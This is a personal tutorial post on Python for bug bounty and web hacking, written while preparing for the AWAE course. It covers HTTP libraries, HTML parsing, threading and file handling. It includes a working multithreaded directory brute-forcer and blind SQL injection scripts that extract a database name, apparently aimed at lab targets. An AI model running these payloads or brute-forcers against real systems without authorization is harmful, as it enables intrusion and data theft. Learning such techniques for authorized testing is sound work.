Python for Bug Bounty Hunters & Web Hackers

Sharing the personal notes I took and the resources I referred to while preparing for AWAE and learning Python.

Check out my original Github Repository here: Python for AWAE

Objective

Learn and understand Python well enough that we can use it to automate our bug bounty tasks or create quick exploits whenever required.

Necessary Python Libraries

urllib2 (if python 2.x is in use)

Code to make a Simple GET Request using urllib2:

```python
import urllib2

url = 'https://www.google.com/'
response = urllib2.urlopen(url)  # GET
print(response.read())
response.close()
```

urllib (if python 3.x is in use)

Code to make a Simple GET Request using urllib:

```python
import urllib.parse
import urllib.request

url = 'https://www.google.com/'
with urllib.request.urlopen(url) as response:  # GET
    content = response.read()
print(content)
```

Code to make a Simple POST Request using urllib:

```python
info = {'user': 'blackhat', 'passwd': '1337'}
data = urllib.parse.urlencode(info).encode()  # data is now of type bytes
req = urllib.request.Request(url, data)
with urllib.request.urlopen(req) as response:  # POST
    content = response.read()
print(content)
```

Requests

  • It's not part of the standard library, so it needs to be installed.
  • Installation:
  • pip install requests
  • Importing:
  • import requests
  • Methods:
    ```python
    r = requests.get(url)
    r = requests.post(url, data={'key': 'value'})
    r = requests.put(url, data={'key': 'value'})
    r = requests.delete(url)
    r = requests.head(url)
    r = requests.options(url)
    ```
  • Print Request URL:
  • print(r.url)
  • Passing params in URLs via GET:
    ```python
    payload = {'key1': 'value1', 'key2': 'value2'}
    r = requests.get('https://httpbin.org/get', params=payload)
    ```
  • Passing a list of items:
    ```python
    payload = {'key1': 'value1', 'key2': ['value2', 'value3']}
    r = requests.get('https://httpbin.org/get', params=payload)
    print(r.url)
    ```
  • Get Response Content in binary form:
  • r.content
  • Get Response Content in json form:
  • r.json()
  • Get raw response content (requires `stream=True` on the request):

    ```python
    r = requests.get(url, stream=True)
    r.raw.read(10)
    ```
  • Add custom header:
    ```python
    url = 'https://api.github.com/some/endpoint'
    headers = {'user-agent': 'my-app/0.0.1'}
    r = requests.get(url, headers=headers)
    ```
  • POST a multipart-encoded file:
    ```python
    url = 'https://httpbin.org/post'
    files = {'file': open('report.xls', 'rb')}
    r = requests.post(url, files=files)
    r.text
    ```
  • Sending our own cookies:
    ```python
    cookies = dict(cookies_are='working')
    r = requests.get(url, cookies=cookies)
    r.text
    ```
  • Others (a combined example follows this list):

    ```python
    r.status_code  # get status code
    r.headers      # get response headers
    r.cookies      # get cookies
    ```
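
Putting a few of these pieces together, here is a minimal sketch of a typical request workflow; the URL, headers, parameters, and cookie values are placeholders for illustration only:

```python
import requests

# placeholder target and values, purely for illustration
url = 'https://httpbin.org/get'
headers = {'User-Agent': 'my-app/0.0.1'}
params = {'q': 'test'}
cookies = {'session': 'abc123'}

r = requests.get(url, headers=headers, params=params, cookies=cookies)

print(r.status_code)                  # HTTP status code
print(r.url)                          # final URL with the encoded query string
print(r.headers.get('Content-Type'))  # a response header
print(r.json())                       # parsed JSON body (httpbin echoes the request back)
```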

lxml and BeautifulSoup packages

  • The lxml package provides a slightly faster parser, while the BeautifulSoup package has logic to automatically detect the target HTML page's encoding.
  • Installation:
  • pip install lxml
  • pip install beautifulsoup4
  • Suppose the HTML content from a request is stored in a variable named content. Using lxml, we can parse it and retrieve the links as follows:
    ```python
    from io import BytesIO

    from lxml import etree
    import requests

    url = 'https://www.example.com'
    r = requests.get(url)
    content = r.content  # content is of type 'bytes'

    parser = etree.HTMLParser()
    content = etree.parse(BytesIO(content), parser=parser)  # Parse into tree
    for link in content.findall('.//a'):  # find all "a" anchor elements
        print(f"{link.get('href')} -> {link.text}")
    ```
    Note: I tested this and I think it only works with python 3.6 or below
  • The same thing using BeautifulSoup:
    ```python
    from bs4 import BeautifulSoup as bs
    import requests

    url = "https://www.google.com"
    r = requests.get(url)

    tree = bs(r.text, 'html.parser')  # Parse into tree
    for link in tree.find_all('a'):   # find all "a" anchor elements
        print(f"{link.get('href')} -> {link.text}")
    ```

Python Multi-threading

I personally think multi-processing is better than multi-threaded Python scripts, but multi-threading is still worth learning unless you want to just sit and watch each request go out one by one, wasting your time.

We usually use Python's `queue` module for multi-threading because it's thread-safe and avoids race conditions. A minimal sketch of the worker/queue pattern is shown below.
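
Here is that minimal sketch, assuming a hypothetical list of paths as the work items; each worker thread keeps pulling items off the shared `queue.Queue` until it is empty:

```python
import queue
import threading

# hypothetical work items, purely for illustration
work = queue.Queue()
for path in ["/admin", "/backup", "/login", "/uploads"]:
    work.put(path)

def worker():
    while True:
        try:
            path = work.get_nowait()  # thread-safe pop; raises queue.Empty when drained
        except queue.Empty:
            break
        print(f"[thread] would request {path}")
        work.task_done()

threads = [threading.Thread(target=worker) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()
```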

  • Here's a directory brute-forcing tool that'll help you understand multi-threading using `queue`:
    ```python
    import queue
    import threading
    import urllib.error
    import urllib.parse
    import urllib.request

    threads = 50
    target_url = "http://testphp.vulnweb.com"
    wordlist_file = "all.txt"  # from SVNDigger
    resume = None
    user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) " \
                 "Gecko/20100101 " \
                 "Firefox/19.0"

    def build_wordlist(wordlst_file):
        # read in the word list
        fd = open(wordlst_file, "r")
        raw_words = [line.rstrip('\n') for line in fd]
        fd.close()

        found_resume = False
        words = queue.Queue()
        for word in raw_words:
            if resume:
                if found_resume:
                    words.put(word)
                else:
                    if word == resume:
                        found_resume = True
                        print("Resuming wordlist from: %s" % resume)
            else:
                words.put(word)
        return words

    def dir_bruter(extensions=None):
        while not word_queue.empty():
            attempt = word_queue.get()
            attempt_list = []

            # check if there is a file extension; if not,
            # it's a directory path we're bruting
            if "." not in attempt:
                attempt_list.append("/%s/" % attempt)
            else:
                attempt_list.append("/%s" % attempt)

            # if we want to bruteforce extensions
            if extensions:
                for extension in extensions:
                    attempt_list.append("/%s%s" % (attempt, extension))

            # iterate over our list of attempts
            for brute in attempt_list:
                url = "%s%s" % (target_url, urllib.parse.quote(brute))
                try:
                    headers = {"User-Agent": user_agent}
                    r = urllib.request.Request(url, headers=headers)
                    response = urllib.request.urlopen(r)
                    if len(response.read()):
                        print("[%d] => %s" % (response.code, url))
                except urllib.error.HTTPError as e:
                    if e.code != 404:
                        print("!!! %d => %s" % (e.code, url))
                    pass

    word_queue = build_wordlist(wordlist_file)
    file_extensions = [".php", ".bak", ".orig", ".inc"]

    for i in range(threads):
        t = threading.Thread(target=dir_bruter, args=(file_extensions,))
        t.start()
    ```

Python Multi-Processing

Let's understand multi-processing using a script that retrieves the length of the database name via blind SQL injection.

    ```python
    import multiprocessing as mp
    import requests

    target = "http://localhost/link/"

    def db_length(number):
        payload = f"te')/**/or/**/(length(database()))={number}#"
        param = {'q': payload}
        r = requests.get(target, param)
        content_length = int(r.headers['Content-length'])
        if content_length > 20:
            print(number)

    if __name__ == "__main__":
        print('[*] Retrieving Database Length: \n[*] Database length: ', end=' ')

        processes = []
        for number in range(30):
            p = mp.Process(target=db_length, args=[number])
            p.start()
            processes.append(p)

        for process in processes:
            process.join()
    ```

Python concurrent.futures

This one is the GOAT. Less code, more capability.

```python
import requests
import concurrent.futures

target = "http://localhost/atutor/"
final_string = {}

def db_length(number):
    payload = f"te')/**/or/**/(length(database()))={number}#"
    param = {'q': payload}
    r = requests.get(target, param)
    content_length = int(r.headers['Content-length'])
    if content_length > 20:
        return number

def atutor_dbRetrieval(l):
    for j in range(32, 256):
        payload = "te')/**/or/**/(select/**/"
        payload += f"ascii(substring(database(),{l},1))={j})#"
        param = {'q': payload}
        r = requests.get(target, param)
        content_length = int(r.headers['Content-length'])
        if content_length > 20:
            final_string[l-1] = chr(j)
            print(''.join(final_string[i] for i in sorted(final_string.keys())))

if __name__ == "__main__":
    print('[*] Retrieving Database Length: \n[*] Database length: ', end=' ')
    db_len = 0
    with concurrent.futures.ProcessPoolExecutor() as executor:
        results = [executor.submit(db_length, _) for _ in range(30)]
        for f in concurrent.futures.as_completed(results):
            if f.result() is not None:
                db_len = f.result()
                print(db_len)

    print("[+] Retrieving Database name: ....")
    with concurrent.futures.ThreadPoolExecutor() as executor:
        results = [executor.submit(atutor_dbRetrieval, index) for index in range(db_len+1)]

    print("[+] Database Name: ", end=" ")
    print(''.join(final_string[i] for i in sorted(final_string.keys())))
    print("[+] Done")
```
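
To see why it needs so little code, here is a minimal sketch (the URLs are placeholders, purely for illustration) that fetches several pages concurrently with `ThreadPoolExecutor.map`:

```python
import concurrent.futures

import requests

# placeholder URLs, purely for illustration
urls = [
    "https://httpbin.org/get",
    "https://httpbin.org/headers",
    "https://httpbin.org/ip",
]

def fetch(url):
    r = requests.get(url)
    return url, r.status_code, len(r.content)

with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
    # map() runs fetch() across the URLs concurrently and
    # yields results in the same order as the inputs
    for url, status, size in executor.map(fetch, urls):
        print(f"{status} {size:>6} {url}")
```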

Using python to navigate file system

OS Module

Note: Python's OS module can be used to navigate through the file system. The most useful functions are listed below; a short usage sketch follows the list.
+ os.getcwd() => get current working directory
+ os.chdir(path) => change directory
+ os.listdir() => list directory
+ os.mkdir() => create a directory
+ os.makedirs() => make directories recursively
+ os.rmdir() => remove directory
+ os.removedirs() => remove directories recursively
+ os.rename(src, dst) => rename file
+ os.stat() => print all info of a file
+ os.walk() => traverse directory recursively
+ os.environ => get environment variables
+ os.path.join(path, file) => join paths without worrying about /
+ os.path.basename() => get basename
+ os.path.dirname() => get dirname
+ os.path.exists() => check if the path exists or not
+ os.path.splitext() => split path and file extension
+ dir(os) => check what methods exist
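
As a quick illustration, here is a minimal sketch that ties a few of these together: it walks the current directory tree and prints each file's full path and extension (the starting directory '.' is just a placeholder):

```python
import os

print(os.getcwd())  # current working directory

# walk the tree below the current directory
for root, dirs, files in os.walk('.'):
    for name in files:
        full_path = os.path.join(root, name)  # build the path safely
        base, ext = os.path.splitext(name)    # split off the file extension
        print(full_path, ext)

print(os.environ.get('HOME'))  # read an environment variable
```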

Using python to read and write files

  • Reading a file
    ```python
    with open('test.txt', 'r') as f:
        f_contents = f.read()
        print(f_contents)
    ```
  • Get all lines into a list
    ```python
    with open('test.txt', 'r') as f:
        f_contents = f.readlines()
        print(f_contents)
    ```
  • Read 1 line at a time
    ```python
    with open('test.txt', 'r') as f:
        f_contents = f.readline()
        print(f_contents)
    ```
  • Reading file efficiently
    ```python
    with open('test.txt', 'r') as f:
        for line in f:
            print(line, end='')
    ```
  • Going back to the start of the file
    ```python
    with open('test.txt', 'r') as f:
        for line in f:
            print(line, end='')
        f.seek(0)            # jump back to the beginning of the file
        print(f.readline())  # read from the start again
    ```
  • Writing to a file
    ```python
    with open('test2.txt', 'w') as f:
        f.write('Test')
    ```
    Note: `w` will overwrite the file, so use `a` if you wanna append
  • Appending to a file
    ```python
    with open('test2.txt', 'a') as f:
        f.write('Test')
    ```
  • Read and write to a file at the same time
    ```python
    with open('test.txt', 'r') as rf:
        with open('test_copy.txt', 'w') as wf:
            for line in rf:
                wf.write(line)
    ```

Conclusion

In my experience, with this much knowledge of Python you can write almost every automation script you'll ever need while doing bug bounties and web hacking.

Reach out to me!

Email Me Here

chavhanshreyas@gmail.com

Wanna paypal me?

paypal.me/shreyaschavhan